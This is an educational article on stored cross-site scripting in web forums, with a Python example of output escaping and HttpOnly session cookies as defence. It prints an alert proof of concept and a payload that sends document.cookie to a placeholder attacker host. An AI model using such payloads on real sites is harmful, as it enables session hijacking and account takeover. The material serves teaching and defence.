Cross-Site Scripting is a client-side attack where an attacker attempts to inject malicious JavaScript into a web application so that it is executed in a user’s browser. A key goal of Cross-Site Scripting is to trigger a user’s browser to run a command that will make a request to a server controlled by an attacker. This may be used to retrieve session tokens and achieve session hijacking, or to trigger a drive-by download.
Stored Cross-Site Scripting occurs when an attacker is able to submit a malicious payload to the server and it is stored in the website’s database and sent to users when they request certain pages. As such, POST requests that submit data that is then rendered in a browser may be key areas to investigate. A common example of this would be a web forum where user messages are stored by the database and sent to any user wanting to view the forum page. In this way it is “Stored” by the website.
If an attacker can interact with a forum or any other feature that allows multiple users to see their input, the HTML may appear as follows:
<h1>user: ngs</h1><p>example message</p>
There are two areas where an attacker may attempt to place malicious code. The username and message are both controlled by the attacker and displayed to all users. If an application does not perform any processing to remove malicious payloads, the below PoC may be able to trigger an alert box to appear in the user’s browser.
<h1>user: ngs</h1><p><script>alert(1)</script></p>
A more malicious attack may attempt to steal a user’s session cookie, which would allow an attacker to impersonate the user and gain access to their account. This could be achieved with a payload such as:
<h1>user: ngs</h1><p><script>document.write('<img src="<Attackers IP>?c='+document.cookie+'" />');</script></p>
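The defence against both stored payloads above is to HTML-encode user-controlled fields when they are rendered, and to mark the session cookie HttpOnly so that document.cookie cannot read it. The following Python is an added example, not code from the original article; the forum template, the sample posts and the cookie name are assumptions.

```python
import html

# Constructed sample forum posts: the second and third carry the kind of
# stored-XSS payload shown in the article, as a user would submit them.
POSTS = [
    ("ngs", "example message"),
    ("ngs", "<script>alert(1)</script>"),
    ("<script>alert(1)</script>", "hello"),
]


def render_unsafe(user, message):
    """Vulnerable rendering (assumed template): user-controlled strings are
    concatenated straight into the page, so stored markup is parsed as HTML
    and any <script> runs in every viewer's browser."""
    return f"<h1>user: {user}</h1><p>{message}</p>"


def render_safe(user, message):
    """Hardened rendering: encode both attacker-controlled fields at output
    time so '<', '>', '&' and quotes are displayed literally, never as tags."""
    safe_user = html.escape(user, quote=True)
    safe_message = html.escape(message, quote=True)
    return f"<h1>user: {safe_user}</h1><p>{safe_message}</p>"


def contains_script_tag(rendered):
    """Did a real <script> tag survive into the rendered HTML?"""
    return "<script" in rendered.lower()


def session_cookie_header(token):
    """Set-Cookie value for the session (cookie name is an assumed example):
    HttpOnly keeps it out of document.cookie, which the cookie-stealing
    payload depends on; Secure and SameSite=Strict limit exposure further."""
    return f"session={token}; Path=/; HttpOnly; Secure; SameSite=Strict"


def demo():
    """For each sample post, report whether a live <script> tag survives
    in the unsafe and the safe rendering: list of (unsafe, safe) booleans."""
    return [
        (contains_script_tag(render_unsafe(u, m)),
         contains_script_tag(render_safe(u, m)))
        for u, m in POSTS
    ]


if __name__ == "__main__":
    for (unsafe, safe), (user, message) in zip(demo(), POSTS):
        print(f"{message!r}: unsafe={unsafe} safe={safe}")
    print(session_cookie_header("EXAMPLE-TOKEN"))
```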